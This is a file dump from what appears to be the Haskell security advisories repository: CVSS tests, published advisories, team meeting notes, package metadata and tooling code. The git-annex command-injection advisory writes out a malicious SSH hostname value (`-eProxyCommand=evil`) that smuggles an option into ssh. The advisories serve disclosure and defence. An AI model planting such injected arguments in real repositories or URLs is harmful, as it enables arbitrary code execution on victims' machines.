14 | forM_ examples $ \(cvssString, score, rating) -> do 15 | case CVSS.parseCVSS cvssString of 16 | Left e -> assertFailure (show e) 17 | Right cvss -> do 18 | CVSS.cvssScore cvss @?= (rating, score) 19 | CVSS.cvssVectorString cvss @?= cvssString 20 | CVSS.cvssVectorStringOrdered 
cvss @?= cvssString 21 | 22 | examples :: [(Text, Float, CVSS.Rating)] 23 | examples = 24 | [ ("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", 5.8, CVSS.Medium) 25 | , ("CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", 6.4, CVSS.Medium) 26 | , ("CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", 3.1, CVSS.Low) 27 | , ("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 6.1, CVSS.Medium) 28 | , ("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", 6.4, CVSS.Medium) 29 | , ("CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", 3.1, CVSS.Low) 30 | , ("CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", 4.0, CVSS.Medium) 31 | , ("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", 9.9, CVSS.Critical) 32 | , ("CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", 4.2, CVSS.Medium) 33 | , ("AV:N/AC:L/Au:N/C:N/I:N/A:C", 7.8, CVSS.High) 34 | , ("AV:N/AC:L/Au:N/C:C/I:C/A:C", 10, CVSS.Critical) 35 | , ("AV:L/AC:H/Au:N/C:C/I:C/A:C", 6.2, CVSS.Medium) 36 | ] 37 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0008.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0008" 4 | cwe = [87] 5 | keywords = ["web", "xss", "historical"] 6 | aliases = ["CVE-2021-46888"] 7 | 8 | [[affected]] 9 | package = "hledger-web" 10 | cvss = "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" 11 | [[affected.versions]] 12 | introduced = "0.24" 13 | fixed = "1.23" 14 | 15 | [[references]] 16 | type = "REPORT" 17 | url = "https://github.com/simonmichael/hledger/issues/1525" 18 | [[references]] 19 | type = "INTRODUCED" 20 | url = "https://github.com/simonmichael/hledger/commit/ec51d28839b2910eea360b1b8c72904b51cf7821" 21 | [[references]] 22 | type = "EVIDENCE" 23 | url = "https://www.youtube.com/watch?v=QnRO-VkfIic" 24 | [[references]] 25 | type = "FIX" 26 | url = "https://github.com/simonmichael/hledger/pull/1663" 27 | 28 | ``` 29 | 30 | # Stored XSS in *hledger-web* 31 | 32 | An issue was 
discovered in *hledger-web* < 1.23. A Stored Cross-Site 33 | Scripting (XSS) vulnerability exists in `toBloodhoundJson` that 34 | allows an attacker to execute JavaScript by encoding user-controlled 35 | values in a payload with base64 and parsing them with the `atob` 36 | function. 37 | 38 | *hledger-web* forms sanitise obvious JavaScript, but not obfuscated 39 | JavaScript (see [OWASP Filter Evasion Cheat Sheet][cheatsheet]). 40 | This means *hledger-web* instances, especially anonymously-writable 41 | ones like `demo.hledger.org`, could be loaded with malicious 42 | JavaScript to be executed by subsequent visitors. 43 | 44 | [cheatsheet]: https://owasp.org/www-community/xss-filter-evasion-cheatsheet 45 | 46 | Reported by Gaspard Baye and Hamidullah Muslih. Fix by Arsen 47 | Arsenović. 48 | -------------------------------------------------------------------------------- /meeting-notes/2023-05-17.md: -------------------------------------------------------------------------------- 1 | # SRT 2023-05-17 2 | 3 | ## Preview meeting's Action items 4 | 5 | - David: schedule fortnightly meetings in this slot 6 | - David: Contact haskell.org to create the mailing list security-advisories@haskell.org (TODO) 7 | - Fraser: Will create issues based on the contents of these notes to serve as basis for assigning tasks 8 | - David: figure out how to get the Github permissions to happen 9 | 10 | 11 | ## Review open GitHub tickets 12 | 13 | - review open tickets 14 | 15 | 16 | ## License for tool source code 17 | 18 | - Decision: BSD-3-Clause 19 | - Advisories themselves remain under Public Domain 20 | 21 | - Labels for issues PRs: 22 | - ones to add: advisory, tools, operations 23 | 24 | ## Mailing list 25 | 26 | Question from haskell.org admin: "do you want a genuine mailman list that’s like a google group (only members can post), or an “alias list” that’s just an alias that forwards to a specified set of people?" 27 | 28 | - Casey: prefers proper list with archive. 
Broad agreement. 29 | 30 | ## GitHub automation 31 | 32 | BTW, do we merge PRs manually, or do we use an app/bot such as mergify? 33 | 34 | - FT: I'm for it, but it's not urgent. Get the repo "open for business" first. 35 | 36 | ## Nix 37 | 38 | There was a discussion about using it, but not mandating. 39 | 40 | - Agreed. 41 | - FT has a PR relaxing version bounds and adding CI for GHC 8.10 through 9.6. 42 | - https://github.com/blackheaven/security-advisories/blob/tools/introduce-nix/.github/workflows/nix.yml 43 | 44 | ## The tool 45 | 46 | - Tristan: What is the scope? 47 | - David: The initial idea is "what RustSec does". Please rewrite it to whatever we need. 48 | - FT: conformance checking and conversions (e.g OSV, HTML, RSS) 49 | -------------------------------------------------------------------------------- /flake.lock: -------------------------------------------------------------------------------- 1 | { 2 | "nodes": { 3 | "flake-utils": { 4 | "inputs": { 5 | "systems": "systems" 6 | }, 7 | "locked": { 8 | "lastModified": 1731533236, 9 | "narHash": "sha256-l0KFg5HjrsfsO/JpG+r7fRrqm12kzFHyUHqHCVpMMbI=", 10 | "owner": "numtide", 11 | "repo": "flake-utils", 12 | "rev": "11707dc2f618dd54ca8739b309ec4fc024de578b", 13 | "type": "github" 14 | }, 15 | "original": { 16 | "owner": "numtide", 17 | "repo": "flake-utils", 18 | "type": "github" 19 | } 20 | }, 21 | "nixpkgs": { 22 | "locked": { 23 | "lastModified": 1752950548, 24 | "narHash": "sha256-NS6BLD0lxOrnCiEOcvQCDVPXafX1/ek1dfJHX1nUIzc=", 25 | "owner": "NixOS", 26 | "repo": "nixpkgs", 27 | "rev": "c87b95e25065c028d31a94f06a62927d18763fdf", 28 | "type": "github" 29 | }, 30 | "original": { 31 | "owner": "NixOS", 32 | "ref": "nixos-unstable", 33 | "repo": "nixpkgs", 34 | "type": "github" 35 | } 36 | }, 37 | "root": { 38 | "inputs": { 39 | "flake-utils": "flake-utils", 40 | "nixpkgs": "nixpkgs" 41 | } 42 | }, 43 | "systems": { 44 | "locked": { 45 | "lastModified": 1681028828, 46 | "narHash": 
        "sha256-Vy1rq5AaRuLzOxct8nz4T6wlgyUR7zLU309k9mBC768=",
        "owner": "nix-systems",
        "repo": "default",
        "rev": "da67096a3b9bf56a91d16901293e51ba5b49a27e",
        "type": "github"
      },
      "original": {
        "owner": "nix-systems",
        "repo": "default",
        "type": "github"
      }
    }
  },
  "root": "root",
  "version": 7
}
--------------------------------------------------------------------------------
/meeting-notes/2024-09-04.md:
--------------------------------------------------------------------------------
# SRT meeting 2024-09-04

Previously: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-08-21.md

## HSEC-2024-0003 - process fix

- PR [#324](https://github.com/haskell/process/pull/324) published (expect merge and release soon)
- HSEC-2024-0003 advisory update draft PR: [#236](https://github.com/haskell/security-advisories/pull/236)

## *Trusted publishing* for Hackage

- Token workflow
  - Hackage supports token authn today, but they are unscoped
- See also PyPI implementation: https://docs.pypi.org/trusted-publishers/
  - Project page references the trusted repo
  - GHA uses OIDC to auth to PyPI and get short-lived (minutes) token
  - GHA or publishing workflow uses the token to publish new package version.

## Roadmap of ecosystem security improvements

- Man years of effort are already known :)
- We should write it all down in a digestible form.
- Might make getting funding easier?
24 | - Menu / prospectus 25 | 26 | ### New ideas 27 | 28 | - RTS fuzzing (Mihai) 29 | - or general fuzzing tooling for Haskell programmers 30 | 31 | ## haskell-security-action (GHA) 32 | 33 | - Gautier published draft GHA for detecting security 34 | issues and bumping bounds (using [cabal-audit](https://github.com/MangoIV/cabal-audit/pull/50)) 35 | - GHA draft: https://github.com/blackheaven/haskell-security-action 36 | - Playground: https://github.com/blackheaven/vulnerable-sandbox/ 37 | - Please review and test! 38 | - Still a lot of work on it: correct file name/line, fix propositions, PR creation, etc. 39 | 40 | ## Call for volunteers 41 | 42 | - Jose's draft is good. 43 | - How many: "around two or three more members" 44 | - Closing date: end of September. 45 | - Fraser will be primary collector of submissions 46 | -------------------------------------------------------------------------------- /advisories/published/2024/HSEC-2024-0002.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2024-0002" 4 | cwe = [787] 5 | keywords = ["corruption", "vendored-code", "language-c"] 6 | aliases = ["CVE-2019-12900"] 7 | 8 | [[references]] 9 | type = "DISCUSSION" 10 | url = "https://gnu.wildebeest.org/blog/mjw/2019/08/02/bzip2-and-the-cve-that-wasnt/" 11 | 12 | [[references]] 13 | type = "DISCUSSION" 14 | url = "http://scary.beasts.org/security/CESA-2008-005.html" 15 | 16 | [[references]] 17 | type = "ADVISORY" 18 | url = "https://access.redhat.com/security/cve/cve-2019-12900" 19 | 20 | [[references]] 21 | type = "FIX" 22 | url = "https://sourceware.org/git/?p=bzip2.git;a=commit;h=7ed62bfb46e87a9e878712603469440e6882b184" 23 | 24 | [[affected]] 25 | package = "bzlib" 26 | cvss = "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" 27 | 28 | [[affected.versions]] 29 | introduced = "0.4" 30 | fixed = "0.5.2.0" 31 | 32 | [[affected]] 33 | package = "bz2" 34 | cvss = 
"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"

[[affected.versions]]
introduced = "0.1.0.0"
fixed = "1.0.1.1"

[[affected]]
package = "bzlib-conduit"
cvss = "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"

[[affected.versions]]
introduced = "0.1.0.0"
fixed = "0.3.0.3"
```

# out-of-bounds write when there are many bzip2 selectors

A malicious bzip2 payload may produce a memory corruption
resulting in a denial of service and/or remote code execution.
Network services or command line utilities decompressing
untrusted bzip2 payloads are affected.

Note that the exploitation of this bug relies on an undefined
behavior that appears to be handled safely by current compilers.

The Haskell libraries are vulnerable when they are built using
the bundled C library source code, which is the default
in most cases.
--------------------------------------------------------------------------------
/code/osv/osv.cabal:
--------------------------------------------------------------------------------
cabal-version: 2.4
name: osv
version: 0.2.0.0

-- A short (one-line) description of the package.
synopsis:
  Open Source Vulnerability format

-- A longer description of the package.
description:
  Open Source Vulnerability format.

-- A URL where users can report bugs.
-- bug-reports:

-- The license under which the package is released.
license: BSD-3-Clause
author: Haskell Security Response Team
maintainer: security-advisories@haskell.org

-- A copyright notice.
-- copyright:
category: Data
extra-doc-files: CHANGELOG.md, README.md

tested-with:
  GHC ==8.10.7 || ==9.0.2 || ==9.2.8 || ==9.4.8 || ==9.6.6 || ==9.8.3 || ==9.10.1 || ==9.12.1

library
  exposed-modules:
    Security.OSV

  build-depends:
    , aeson >=2.0.1.0 && <3
    , base >=4.14 && <5
    , cvss >=0.2 && <0.3
    , purl >=0.1 && <0.2
    , text >=1.2 && <3
    , time >=1.9 && <1.15

  hs-source-dirs: src
  default-language: Haskell2010
  ghc-options:
    -Wall -Wcompat -Widentities -Wincomplete-record-updates
    -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints

test-suite spec
  type: exitcode-stdio-1.0
  hs-source-dirs: test
  main-is: Spec.hs
  build-depends:
    , base >= 4.14 && < 5
    , tasty <2

  default-language: Haskell2010
  ghc-options:
    -Wall -Wcompat -Widentities -Wincomplete-record-updates
    -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints
--------------------------------------------------------------------------------
/meeting-notes/2024-11-27.md:
--------------------------------------------------------------------------------
# Haskell SRT meeting 2024-11-27

Previously: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-11-13.md

Present: Fraser, Gautier, Montez, Tristan

## Onboarding

The new team members have been introduced to the on-going work.

## GitHub Open Source Secure Fund

GitHub opened a program to [fund securing FOSS projects](https://github.blog/news-insights/company-news/announcing-github-secure-open-source-fund/)
until January 7th.

- Project ideas:
  - GitHub integration
    - Correct file/line
    - Snippet proposition/PR opening
  - Hackage
    - show known vulnerability info
    - vulnerabilities endpoints (publish vulnerability info)
      - e.g.
`advisories.haskell.org/...` 24 | - [API server (#166)](https://github.com/haskell/security-advisories/issues/166) 25 | - improve the HTML presentation of the advisories 26 | - https://haskell.github.io/security-advisories/advisory/... 27 | 28 | - OSV ask: `human_link` source definition 29 | - https://github.com/haskell/security-advisories/issues/252 30 | - We can already address this - link to e.g. 31 | `https://haskell.github.io/security-advisories/HSEC-xxxx` 32 | - Montez will take this side. 33 | - But we should also improve the HTML presentation in those pages. 34 | - Gautier will take this side. 35 | 36 | - OSV ask: JSON Schema validation 37 | - https://github.com/haskell/security-advisories/issues/251 38 | - JSON schema: 39 | https://github.com/ossf/osv-schema/blob/main/validation/schema.json 40 | - Tristan will take the first look 41 | 42 | - Onboarding 43 | - Follow-up on mailing list membership for Lei and Montez 44 | - Github org membership, sorted now, but Fraser to add this step 45 | to the onboarding docs. 
46 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0009.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0009" 4 | cwe = [20, 78] 5 | keywords = ["ssh", "command-injection", "historical"] 6 | aliases = ["CVE-2017-12976"] 7 | related = ["CVE-2017-9800", "CVE-2017-12836", "CVE-2017-1000116", "CVE-2017-1000117"] 8 | 9 | [[affected]] 10 | package = "git-annex" 11 | cvss = "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" 12 | [[affected.versions]] 13 | introduced = "0" 14 | fixed = "6.20170818" 15 | 16 | [[references]] 17 | type = "ADVISORY" 18 | url = "https://git-annex.branchable.com/security/CVE-2017-12976/" 19 | [[references]] 20 | type = "FIX" 21 | url = "http://source.git-annex.branchable.com/?p=source.git;a=commitdiff;h=df11e54788b254efebb4898b474de11ae8d3b471" 22 | ``` 23 | 24 | # *git-annex* command injection via malicious SSH hostname 25 | 26 | *git-annex* was vulnerable to the same class of security hole as 27 | git's **CVE-2017-1000117**. In several cases, `git-annex` parses a 28 | repository URL, and uses it to generate a `ssh` command, with the 29 | hostname to ssh to coming from the URL. If the hostname it parses is 30 | something like `-eProxyCommand=evil`, this could result in arbitrary 31 | local code execution. 32 | 33 | Some details of URL parsing may prevent the exploit working in some 34 | cases. 35 | 36 | Exploiting this would involve the attacker tricking the victim into 37 | adding a remote something like `ssh://-eProxyCommand=evil/blah`. 38 | 39 | One possible avenue for an attacker that avoids exposing the URL to 40 | the user is to use `initremote` with an SSH remote, so embedding the 41 | URL in the *git-annex* branch. Then the victim would enable it with 42 | `enableremote`. 43 | 44 | This was fixed in version **6.20170818**. 
Now there's a `SshHost` type that is not allowed to start with a
dash, and every invocation of `ssh` by `git-annex` uses a function
that takes a `SshHost`.
--------------------------------------------------------------------------------
/meeting-notes/2024-05-29.md:
--------------------------------------------------------------------------------
# SRT meeting 2024-05-29

Previously:
https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-05-15.md

## publishing our tools on Hackage

- Packages: cvss, osv, hsec-core, hsec-tools, hsec-sync
- FT will upload. Just asking if there are further comments about
  version numbers, dep version constraints, etc?
- Co-maintainers - who, and what are your Hackage usernames?
  - `gdifolco`
  - `TristanCacqueray`

## SRT members, moving forward

- Casey has limited time
- We're at the 1y point, time for a new call?
- Updating the charter: Casey thinks we should expand it to be more
  involved with the tooling (within and without ecosystem)

- Remember the original motivation: supporting enterprise adoption.
  - e.g. financial industry - how well do we meet their standards?
  - Survey industry users to understand what is lacking?
  - [FT] FIPS mode, verified crypto libraries (i.e. back on to
    OpenSSL/NSS/etc)

- What is missing:
  - SBOM? ("software provenance")
  - Larger discovery effort?
  - OSS-Fuzz support?
  - OpenSSF best practices:
    https://www.bestpractices.dev/en/criteria/0 ?

- SRT has some context-switching. Should we have separate subgroups
  for triage / tool development / etc?

- We can discuss on list over the coming days, and engage with folks
  at ZuriHac to determine the next move. General agreement that we
  can/should grow the team.

- Retirements: Casey will step back. (Thank you for all you've
  done!)
## YAML advisory has been rejected ([#181](https://github.com/haskell/security-advisories/issues/181))

- FT will ask Julian if he is satisfied with this conclusion.

## deps.dev

- FT received message from deps.dev developer at Google. Still need
  to follow up.
--------------------------------------------------------------------------------
/docs/reports.md:
--------------------------------------------------------------------------------
# SRT reporting

The SRT is to report each quarter to update the community on the
activities and plans of the SRT.

## Who should write the report?

The SRT project lead prepares the report (though the task could be
delegated with sufficient notice). It is a good idea to gather
items for the report through the reporting period, so you don't
forget anything significant.

## Publishing reports

The canonical version of each report is committed to this repo under
`/reports/`.

Each report should also be republished on [Discourse], and added to
the list of reports at https://www.haskell.org/security/ (file a
pull request against
[haskell-infra/www.haskell.org](https://github.com/haskell-infra/www.haskell.org/)).

Reports for the previous quarter should generally be published in
the first few weeks following that quarter. In some cases we have
delayed a report to include significant new developments, e.g. the
result of a *Call for Volunteers*.

[Discourse]: https://discourse.haskell.org/

## Report content

Each report should contain:

- A preamble explaining what the SRT is and who are its members
  (just copy the preamble from the previous report).

- Statistics about the number of contemporary and historical
  advisories added to the advisory database during the reporting
  period.
  Also mention any new or outstanding HSEC ID reservations
  (for embargoed issues), and any other significant updates to the
  **content** of the advisory DB.

- Discussion of any significant security incidents during the
  reporting period that impacted Haskell infrastructure, the
  toolchain, or the library ecosystem.

- Mention of notable updates to SRT-owned tools and libraries, and
  related developments in downstream tooling.

- Any other news related to Haskell ecosystem security.
--------------------------------------------------------------------------------
/code/hsec-tools/app/Command/Reserve.hs:
--------------------------------------------------------------------------------
```haskell
{-# LANGUAGE LambdaCase #-}

module Command.Reserve where

import Control.Monad (when)
import System.Exit (die)
import System.FilePath ((</>), (<.>))

import Security.Advisories.Git
  ( add
  , commit
  , explainGitError
  )
import Security.Advisories.Core.HsecId
  ( placeholder
  , printHsecId
  , getNextHsecId
  )
import Security.Advisories.Filesystem
  ( dirNameAdvisories
  , dirNameReserved
  , getGreatestId
  )

import Util (ensureRepo)

-- | How to choose IDs when creating advisories or
-- reservations.
data IdMode
  = IdModePlaceholder
  -- ^ Create a placeholder ID (e.g. HSEC-0000-0000). Real IDs
  -- will be assigned later.
  | IdModeAuto
  -- ^ Use the next available ID. This option is more likely to
  -- result in conflicts when submitting advisories or reservations.

data CommitFlag = Commit | DoNotCommit
  deriving (Eq)

runReserveCommand :: Maybe FilePath -> IdMode -> CommitFlag -> IO ()
runReserveCommand mPath idMode commitFlag = do
  repoPath <- ensureRepo mPath

  hsid <- case idMode of
    IdModePlaceholder -> pure placeholder
    IdModeAuto -> do
      curMax <- getGreatestId repoPath
      getNextHsecId curMax

  -- A reservation is an empty file named after the ID, under
  -- advisories/reserved/.
  let
    advisoriesPath = repoPath </> dirNameAdvisories
    fileName = printHsecId hsid <.> "md"
    filePath = advisoriesPath </> dirNameReserved </> fileName
  writeFile filePath ""  -- write empty file

  when (commitFlag == Commit) $ do
    let msg = printHsecId hsid <> ": reserve id"
    add repoPath [filePath] >>= \case
      Left e -> die $ "Failed to update Git index: " <> explainGitError e
      Right _ -> pure ()
    commit repoPath msg >>= \case
      Left e -> die $ "Failed to create Git commit: " <> explainGitError e
      Right _ -> pure ()
```
--------------------------------------------------------------------------------
/meeting-notes/2023-07-12.md:
--------------------------------------------------------------------------------
# SRT 2023-07-12

[Previous meeting](https://github.com/haskell/security-advisories/blob/main/meeting-notes/2023-06-28.md)

## Previous Items

* Fraser sent the announcement/Q2 report - we are officially launched!
* Tristan: will adapt responsible disclosure instructions - merged!
* We do need to collect emails of packagers - Mihai will probably have them by tomorrow
* We need a process update that specifies a collaboration with maintainers where they ensure patches apply cleanly and approve everything
* Fraser: complete OSV data export CI action
  * Works on the test instance, waiting for review from OSV: https://github.com/haskell/security-advisories/tree/generated/osv-export/2023
* Tristan: Will email mailing list about issue and affected packages Disclosure

## Switch TOML libraries?

We were sent a patch to use a different TOML parser by its author. David will get back to the author and ask him for a PR
- Advantages: It can output TOML (nice in case of schema upgrades) and it lets us delete a little code

## GHC issue 23538
https://gitlab.haskell.org/ghc/ghc/-/issues/23538

David will ask GHC developers about an advisory

## Example roleplay (PR #56)
https://github.com/haskell/security-advisories/pull/56

David submitted and got CI to pass.
Process issues:
* CVSS didn't get checked, and David didn't know what to do - ask for screenshot of CVSS calculator?
* Can we make a GitHub bot that creates a verbose table from a CVSS vector in a PR?
* PR isn't merged
* What about a bot that merges anything approved? We can just use an existing one.
## Action Items
- Tristan: will create an issue about using the declaration field in the schema for tooling
- David will ask GHC about a base advisory
- David will ask the TOML library author for a PR
- Mihai will get the rest of the package maintainer emails
--------------------------------------------------------------------------------
/meeting-notes/2024-07-24.md:
--------------------------------------------------------------------------------
# SRT meeting 2024-07-24

Previously:
https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-07-10.md


## GitHub dependabot integration

- Gautier talked to Arnaud, who made an integration attempt
- Arnaud paired with someone in GH but they have not made
  significant work on it
- We may have to start over


## Tooling

- Finally merged the snapshots PR [(#179)][pr-179] (thanks Gautier)
- Merged the CVSS v2.0 (+ OSV) fix [(#218)][pr-218] (thanks Tristan)
- Adding the GHC ecosystem support [(#213)][pr-213]
  - review in progress
  - advisory for GHC numeric bugs [(#214)][pr-214] depends on this
- CVSS 4.0 support [(#208)][pr-208]
  - ping andrii for status update?

[pr-179]: https://github.com/haskell/security-advisories/pull/179
[pr-208]: https://github.com/haskell/security-advisories/pull/208
[pr-213]: https://github.com/haskell/security-advisories/pull/213
[pr-214]: https://github.com/haskell/security-advisories/pull/214
[pr-218]: https://github.com/haskell/security-advisories/pull/218


## Quarterly report

- Was published:
  https://discourse.haskell.org/t/haskell-security-response-team-2024-april-june-report/9983


## Call for Volunteers

- We should draft and publish one soon.
- Q: call for a specific number, or wait and see?
  - Be general and commit later.
  - We can mention particular projects / initiatives and applicants
    can (optionally) identify the particular area(s) they'd like to
    tackle.
  - This includes development efforts, and "latent capacity" for
    dealing with advisory or security incidents.
- José will draft an announcement, and we will review on the mailing
  list.


## Mailing list

- FT will make sure José is on it!


## Bay Area Haskell meetup

- Mihai will present about SRT at a future session
--------------------------------------------------------------------------------
/meeting-notes/2025-07-10.md:
--------------------------------------------------------------------------------
# SRT meeting 2025-07-10

Previously:
https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-06-25.md


## Q2 report topics

- ZuriHac report (Tristan will write the section)
- 1 new advisory (a couple in early April were accounted in Q1 report)
- The web index not-vulnerability report :)
- OCaml security team shout-out (see below)


## Security work "prospectus"

Following informal conversation with Jose at ZuriHac, it is time to
pull this together. Gather all the high-impact ideas (which are
currently scattered across meeting notes, issues, etc) into a
"prospectus" document which may help with funding decisions.


## Hackage key signing

> We’re looking for more people to take part in the hackage key signing
> ceremony. I figured it would be useful to have someone from the security
> response team be part of that trusted group. Is this something you’d be
> willing to do? It would require you to take part of the ceremony in the
> next few weeks, But it can all be done online.

FT will circle back with Jose and find out next steps.
## OCaml security team

OCSF is starting a security team. Richard Eisenberg reached out to
FT to ask for advice. FT will share some resources.


## Embargoed advisory process

Tristan feels our current *ad hoc* system using the mailing list
could be improved. Tristan will investigate and make
recommendations on what we could implement to improve the processes.


## Purl library

Consensus: merge and publish without delay. Gautier will do the
Hackage publishing.


## SRT processes documentation

FT realised that we need to include the hackage package
maintainership in the checklists. So he will fix that :)


## Next SRT meeting

It is the summer holidays (north of the Equator). Skip it
for all?
--------------------------------------------------------------------------------
/meeting-notes/2024-05-01.md:
--------------------------------------------------------------------------------
# SRT meeting 2024-05-01

Previous notes:
https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-04-17.md

## CI security advice

- Mihai published the draft:
  https://github.com/haskell/security-advisories/blob/main/guides/github.md
- A couple more comments to handle, then it will be published to Discourse

## Web area for SRT

- FT will work to bootstrap this. We can publish our guides,
  reports, and general information there.

## Publishing our packages to Hackage

- FT will begin on this in the next week.
- Discussion: do we want to set up auto-publish from GitHub?
  - There is a GHA by Brandon Chinn to publish to Hackage.
  - https://github.com/fourmolu/fourmolu/blob/main/.github/workflows/release.yml
  - Does it work with subpackages? We would need to see.
  - From supply chain security POV it's better to have an action
    than having developers make the dist and publish themselves.
  - Maybe this is a good topic for our second *guide* and/or a tool
    to validate release tarball from the sources :)
  - We will look into this after the initial package release to Hackage.

## New meeting time

- The when2meet tool does not seem to take timezones into account?
- We might need a second round / better tool :)
- FT will look for a better tool. Or else use same tool but in UTC.

## The expanding scope of SRT

- With cabal-audit proposed for our repo, the scope has expanded.

- Advisory workload is low, so team does have capacity to own this

- FT: I see cabal-audit as a transitional effort anyway; ideally we
  do not have to own it forever and the capability can be absorbed
  into Cabal itself.

- Idea: cabal-audit lives in its own repo, not security-advisories repo
  - Prerequisite: publish our packages
  - Advantage: not "owned" by SRT, others might be more eager/willing to contribute.
  - We will have the discussion in public, with the contributor MangoIV.
--------------------------------------------------------------------------------
/advisories/published/2023/HSEC-2023-0011.md:
--------------------------------------------------------------------------------
```toml
[advisory]
id = "HSEC-2023-0011"
cwe = [200]
keywords = ["exfiltration", "pgp", "historical"]
aliases = ["CVE-2018-10859"]
related = ["HSEC-2023-0010", "CVE-2018-10857"]

[[affected]]
package = "git-annex"
cvss = "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
[[affected.versions]]
introduced = "0.20110417"
fixed = "6.20180626"

[[references]]
type = "ADVISORY"
url = "https://git-annex.branchable.com/security/CVE-2018-10857_and_CVE-2018-10859/"
```

# *git-annex* GPG decryption attack via compromised remote

A malicious server for a special remote could trick `git-annex` into
decrypting a file that was encrypted to the user's GPG key. This
attack could be used to expose encrypted data that was never stored
in *git-annex*. Daniel Dent discovered this attack in collaboration
with Joey Hess.

To perform this attack the attacker needs control of a server
hosting an *encrypted* special remote used by the victim's
*git-annex* repository. The attacker uses `git annex addurl
--relaxed` with an innocuous URL (`--relaxed` records the URL
without a content hash, so nothing later constrains what the remote
may return for it), and waits for the user's `git-annex` to download
it, and upload an (encrypted) copy to the special remote they also
control. At some later point, when the user downloads the content
from the special remote, the attacker instead sends them the content
of the GPG-encrypted file that they wish to have decrypted in its
place (which may have been exfiltrated from the victim's system via
the attack described in **HSEC-2023-0010** / **CVE-2018-10857**, or
acquired by other means).
Finally, the attacker drops their own copy of the original
innocuous URL, and waits for the victim `git-annex` to send them the
accidentally decrypted file.

The issue was fixed by making `git-annex` refuse to download
encrypted content from special remotes, unless it knows the hash of
the expected content. When the attacker provides some other
GPG-encrypted content, it will fail the hash check and be discarded.
--------------------------------------------------------------------------------
/code/hsec-core/hsec-core.cabal:
--------------------------------------------------------------------------------
```cabal
cabal-version:      2.4
name:               hsec-core
version:            0.3.0.0

-- A short (one-line) description of the package.
synopsis:           Core package representing Haskell advisories

-- A longer description of the package.
description:        Core package representing Haskell advisories.

-- A URL where users can report bugs.
-- bug-reports:

-- The license under which the package is released.
license:            BSD-3-Clause
author:             Haskell Security Response Team
maintainer:         security-advisories@haskell.org

-- A copyright notice.
-- copyright:
category:           Data
extra-doc-files:    CHANGELOG.md, README.md

tested-with:
  GHC ==8.10.7 || ==9.0.2 || ==9.2.8 || ==9.4.8 || ==9.6.6 || ==9.8.3 || ==9.10.1 || ==9.12.1

library
  exposed-modules:
    Security.Advisories.Core.Advisory
    Security.Advisories.Core.HsecId

  build-depends:
    , base >=4.14 && <5
    , Cabal-syntax >=3.8.1.0 && <3.15
    , cvss >=0.2 && <0.3
    , network-uri >=2.6.3.0 && <2.8
    , osv >=0.1 && <0.3
    , pandoc-types >=1.22 && <2
    , safe >=0.3 && <0.4
    , text >=1.2 && <3
    , time >=1.9 && <1.15
  hs-source-dirs: src
  default-language: Haskell2010
  ghc-options:
    -Wall -Wcompat -Widentities -Wincomplete-record-updates
    -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints

test-suite spec
  type: exitcode-stdio-1.0
  hs-source-dirs: test
  main-is: Spec.hs
  other-modules:
    Spec.QueriesSpec
  build-depends:
    , base
    , Cabal-syntax
    , cvss
    , hsec-core
    , tasty <2
    , tasty-hunit <0.11
    , text

  default-language: Haskell2010
  ghc-options:
    -Wall -Wcompat -Widentities -Wincomplete-record-updates
    -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints
```
--------------------------------------------------------------------------------
/meeting-notes/2023-07-26.md:
--------------------------------------------------------------------------------
# SRT 2023-07-26

## osv.dev

- Hackage advisories are in production now
- Version enumeration for Hackage and GHC was merged
- Outstanding task: add examples to osv-schema
  - Mihai has PR in the works

## Update on handling embargoed stuff

- Gathering contact points for downstream
- Someone needs to connect the dots to send messages
- Contact list needs to be committed somewhere
  - Private contacts should not be in the repo... so where?
  - Stored encrypted version in the security-advisories repo?
    - no
  - Use HF bitwarden account? (access/modify via HF admin access)
    - agreed

## What should be part of the database format?

- Repo data storage / semantics. David has some concerns:
  - Symlinks. Doesn't work well on Windows?
  - dates being stored in Git repo

## Audit GHCup download practices

- https://github.com/haskell/ghcup-hs/issues/858
- FT's comments: https://github.com/haskell/ghcup-hs/issues/858#issuecomment-1639300092

## Reserving HSEC IDs

- It would be useful to be able to reserve an HSEC ID
- FT will propose a way to do it (discuss it in a GH issue)

## Any other known historical (or current) issues?

- Pandoc
  - https://nvd.nist.gov/vuln/detail/CVE-2023-38745
  - https://nvd.nist.gov/vuln/detail/CVE-2023-35936

## Action items
- Mihai
  - Will follow up for project contacts for embargoed issues
  - Look into GHCup #858
- Everyone
